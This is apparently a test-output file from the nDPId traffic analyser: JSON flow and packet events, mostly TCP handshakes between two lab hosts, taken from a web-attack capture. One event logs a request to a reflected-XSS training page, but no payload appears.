+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347868358,"flow_last_seen":1499347873865,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347869628,"flow_last_seen":1499347874866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347869628,"flow_last_seen":1499347874866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347873465,"flow_last_seen":1499347878867,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33594,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347873465,"flow_last_seen":1499347878867,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33594,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8572,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348001148,"flow_last_seen":1499348001148,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348001148,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8572,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":1,"flow_last_seen":1499348001148,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348001148,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pkpAAD4GH4asEAABwKgKMohuAFDUG39mAAAAAKACchCoWgAAAgQFtAQCCAoBPNksAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8573,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":2,"flow_last_seen":1499348001148,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348001148,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiG4I9+h41Bt\/Z6AScSAJQwAAAgQFtAQCCAoD5qqgATzZLAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8574,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":3,"flow_last_seen":1499348001148,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348001148,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0pktAAD4GH42sEAABwKgKMohuAFDUG39nCPfoeYAQAOWoSgAAAQEICgE82SwD5qqg"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8581,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348002450,"flow_last_seen":1499348002450,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348002450,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8581,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":1,"flow_last_seen":1499348002450,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348002450,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80ydAAD4G8qisEAABwKgKMoh8AFCQawlWAAAAAKACchBgyAAAAgQFtAQCCAoBPNpxAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8582,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":2,"flow_last_seen":1499348002450,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348002450,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiHx5OBm2kGsJV6AScSAe7QAAAgQFtAQCCAoD5qvlATzacQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":3,"flow_last_seen":1499348002450,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348002450,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00yhAAD4G8q+sEAABwKgKMoh8AFCQawlXeTgZt4AQAOW98wAAAQEICgE82nID5qvl"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8593,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348003742,"flow_last_seen":1499348003742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348003742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8593,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":1,"flow_last_seen":1499348003742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348003742,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Q\/NAAD4Ggd2sEAABwKgKMoiKAFCK7JhGAAAAAKACchDWBAAAAgQFtAQCCAoBPNu1AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8594,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":2,"flow_last_seen":1499348003742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348003742,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiIrxrFQGiuyYR6AScSDgIAAAAgQFtAQCCAoD5q0pATzbtQEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8595,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":3,"flow_last_seen":1499348003743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348003743,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Q\/RAAD4GgeSsEAABwKgKMoiKAFCK7JhH8axUB4AQAOV\/KAAAAQEICgE827UD5q0p"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8611,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348006334,"flow_last_seen":1499348006334,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348006334,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8611,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":1,"flow_last_seen":1499348006334,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348006334,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NJlAAD4GkTesEAABwKgKMoikAFAqsOqkAAAAAKACchDhQAAAAgQFtAQCCAoBPN49AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8612,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":2,"flow_last_seen":1499348006334,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348006334,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiKQqwf7AKrDqpaAScSAFBgAAAgQFtAQCCAoD5q+xATzePQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":3,"flow_last_seen":1499348006335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348006335,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NJpAAD4GkT6sEAABwKgKMoikAFAqsOqlKsH+wYAQAOWkDQAAAQEICgE83j0D5q+x"} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8623,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348002450,"flow_last_seen":1499348007347,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499348007347,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8627,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348007599,"flow_last_seen":1499348007599,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348007599,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8627,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":1,"flow_last_seen":1499348007599,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348007599,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+WFAAD4GzG6sEAABwKgKMoiyAFBEayYYAAAAAKACchCKyAAAAgQFtAQCCAoBPN95AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8628,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":2,"flow_last_seen":1499348007599,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348007599,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiLJr5HteRGsmGaAScSDvkAAAAgQFtAQCCAoD5rDtATzfeQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":3,"flow_last_seen":1499348007600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348007600,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+WJAAD4GzHWsEAABwKgKMoiyAFBEayYZa+R7X4AQAOWOmAAAAQEICgE833kD5rDt"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347874737,"flow_last_seen":1499347879867,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33608,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347874737,"flow_last_seen":1499347879867,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347877292,"flow_last_seen":1499347882869,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33634,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347877292,"flow_last_seen":1499347882869,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33634,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347878568,"flow_last_seen":1499347883869,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33648,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347878568,"flow_last_seen":1499347883869,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33648,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347881141,"flow_last_seen":1499347886869,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33674,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347881141,"flow_last_seen":1499347886869,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33674,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347882404,"flow_last_seen":1499347887870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33688,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347882404,"flow_last_seen":1499347887870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33688,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347883693,"flow_last_seen":1499347888870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33702,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347883693,"flow_last_seen":1499347888870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33702,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8645,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348010145,"flow_last_seen":1499348010145,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348010145,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35020,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8645,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":1,"flow_last_seen":1499348010145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348010145,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81alAAD4G8CasEAABwKgKMojMAFACvDRcAAAAAKACchC7nQAAAgQFtAQCCAoBPOH1AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8646,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":2,"flow_last_seen":1499348010145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348010145,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiMxKQ6iIArw0XaAScSASYQAAAgQFtAQCCAoD5rNpATzh9QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":3,"flow_last_seen":1499348010146,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348010146,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01apAAD4G8C2sEAABwKgKMojMAFACvDRdSkOoiYAQAOWxZwAAAQEICgE84fYD5rNp"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8654,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348011433,"flow_last_seen":1499348011433,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348011433,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8654,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":1,"flow_last_seen":1499348011433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348011433,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89\/VAAD4GzdqsEAABwKgKMojaAFB2oBTCAAAAAKACchBmAwAAAgQFtAQCCAoBPOM3AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8655,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":2,"flow_last_seen":1499348011433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348011433,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiNplHDbhdqAUw6AScSASUwAAAgQFtAQCCAoD5rSrATzjNwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8656,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":3,"flow_last_seen":1499348011433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348011433,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09\/ZAAD4GzeGsEAABwKgKMojaAFB2oBTDZRw24oAQAOWxWgAAAQEICgE84zcD5rSr"} 